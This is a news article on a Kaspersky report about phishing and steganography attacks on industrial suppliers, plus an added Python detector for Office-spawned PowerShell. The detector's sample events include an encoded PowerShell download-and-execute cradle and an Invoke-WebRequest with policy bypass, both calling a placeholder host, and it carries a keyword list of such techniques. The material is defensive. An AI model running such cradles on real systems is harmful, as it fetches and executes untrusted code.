Cybersecurity company Kaspersky has released a report on a series of targeted attacks in several countries. The attacks were aimed at industrial equipment suppliers and software providers.
The attacks hit systems in Japan, Italy, Germany and the United Kingdom. The attackers used malicious Microsoft Office documents and PowerShell scripts, together with several techniques intended to thwart detection and analysis. Among them was steganography: malware components were hidden inside ordinary image files.
“This attack attracted attention due to several non-standard technical solutions used by the attackers,” said Vyacheslav Kopeytsev, a security expert at Kaspersky. “For instance, the malware module is encoded inside the image using steganography methods, and the image itself is hosted on legitimate web resources. This makes it almost impossible to detect the download of such malware using network traffic monitoring and control tools. From the point of view of technical solutions, such activity does not differ from the usual access given to legitimate image hosting. Coupled with the targeted nature of infections, these techniques indicate the sophisticated and selective nature of these attacks.”
To gain initial access, the attackers used phishing emails tailored to each victim. The malware only proceeded with its malicious activity if the operating system's language settings matched the language of the phishing email.
According to the report, the attackers used Mimikatz, a credential-dumping tool, to steal the authentication data of Windows accounts stored on a compromised system. Kaspersky experts note that this data can be used to gain access to other systems on the enterprise network and extend the attack.
“It is a matter of concern that industrial contractors are among the victims of the attack,” Kopeytsev said. “If the authentication data of employees of the contractor organization falls into malicious hands, this can lead to many negative consequences, starting with the theft of confidential data and ending with attacks on industrial enterprises through remote administration tools used by the contractor.”
Beyond its findings on the attacks against industrial equipment suppliers and software providers, Kaspersky's report includes a series of recommendations for industrial organizations that want to reduce their risk of being attacked. For these attacks specifically, organizations should restrict the execution of macros in Microsoft Office documents, restrict the execution of PowerShell scripts where possible, and pay particular attention to PowerShell process start events whose parent process is a Microsoft Office application.
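The last recommendation is a concrete detection opportunity. The following Python is an added example, not code from Kaspersky's report: it parses constructed process-creation records (a flattened key=value rendering of the fields that Sysmon Event ID 1 or Windows event 4688 provide, not a real log format) and flags PowerShell started by an Office application. It also decodes any `-EncodedCommand` payload so that download-cradle keywords hidden in base64 are still matched. The Office host list, the keyword list and the sample events are my own assumptions.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office hosts that have no business spawning a shell (assumed list).
# Sysmon and event 4688 report full paths, so comparison is on the file name.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Download-cradle and evasion fragments worth flagging (assumed list).
CRADLE_KEYWORDS = ("downloadstring", "downloadfile", "invoke-webrequest",
                   "net.webclient", "iex", "invoke-expression",
                   "frombase64string", "-w hidden", "windowstyle hidden")

# -e / -ec / -enc / -encodedcommand followed by a base64 blob ("-ep" is not matched).
_ENCODED_RE = re.compile(r"-e(?:n[a-z]*|c)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
# key=value pairs; quoted values may contain spaces.
_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class ProcessCreate:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcessCreate:
    """Parse one flattened key=value process-creation record (our own format)."""
    fields = {k: v.strip('"') for k, v in _FIELD_RE.findall(line)}
    return ProcessCreate(fields["Image"], fields["ParentImage"],
                         fields.get("CommandLine", ""))


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = _ENCODED_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError: not real base64
        return ""


def classify(ev: ProcessCreate) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a PowerShell start worth a look, else None."""
    child, parent = _basename(ev.image), _basename(ev.parent_image)
    if child not in POWERSHELL_IMAGES:
        return None
    # Search the raw command line and any decoded -enc payload together.
    haystack = (ev.command_line + " " + decode_encoded_command(ev.command_line)).lower()
    hits = [k for k in CRADLE_KEYWORDS if k in haystack]
    if parent in OFFICE_PARENTS:
        # Office -> PowerShell is suspicious on its own; hits only add context.
        detail = f" ({', '.join(hits)})" if hits else ""
        return ("HIGH", f"{parent} spawned {child}{detail}")
    if hits:
        return ("MEDIUM", f"{child} under {parent} uses {', '.join(hits)}")
    return None


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    return [r for r in (classify(parse_event(line)) for line in lines) if r]


def _ps_encode(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="powershell.exe -File C:\\scripts\\backup.ps1"',
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'CommandLine="powershell.exe -nop -w hidden -enc '
    + _ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.png')")
    + '"',
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="powershell -ep bypass -c Invoke-WebRequest http://example.invalid/x"',
    'Image="C:\\Windows\\System32\\notepad.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" '
    'CommandLine="notepad.exe"',
]

if __name__ == "__main__":
    for severity, reason in scan(SAMPLE_EVENTS):
        print(severity, reason)
```

Run as a script it reports the Word-spawned, encoded download cradle as HIGH and the cleartext `Invoke-WebRequest` under cmd.exe as MEDIUM, while the scheduled backup script and the Excel-spawned Notepad pass. In production the same logic belongs in a SIEM query or Sysmon filter; the point of the HIGH rule is that it fires on the parent-child pair alone, since a legitimate reason for Word or Excel to start PowerShell is rare enough to justify investigating every occurrence.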
Additionally, Kaspersky recommends that organizations install a security solution on corporate endpoints, and also deploy security solutions for operational technology endpoints and networks, so that all critical industrial systems are covered.
“The attack on contractors once again demonstrates that for electric power facilities to be operated reliably, it is critically important to ensure workstations and servers are protected – both on corporate and operational technology networks,” said Anton Shipulin, solution business lead, Kaspersky Industrial CyberSecurity. “Although strong endpoint protection may be enough to prevent similar attacks, in this case, we still recommend using the most comprehensive approach to support the industrial facility’s cyber-defense. Attacks through contractors and suppliers can have completely different entry points within the enterprise, including ones on the OT network.”
Kaspersky also suggests that organizations provide email security training to employees, with particular emphasis on recognizing phishing emails. If an organization suspects that a system has been compromised, it should immediately run an antivirus scan and force password changes for every account that was used to log in to the compromised systems.
“Even though the attack’s objectives remained unclear, it is more accurate to follow the assumption that attackers have the potential to gain access to the facility’s critical systems,” Shipulin said. “Modern means of network monitoring, anomaly and attack detection can help to detect signs of an attack on industrial control systems and equipment in a timely manner, and prevent a possible incident.”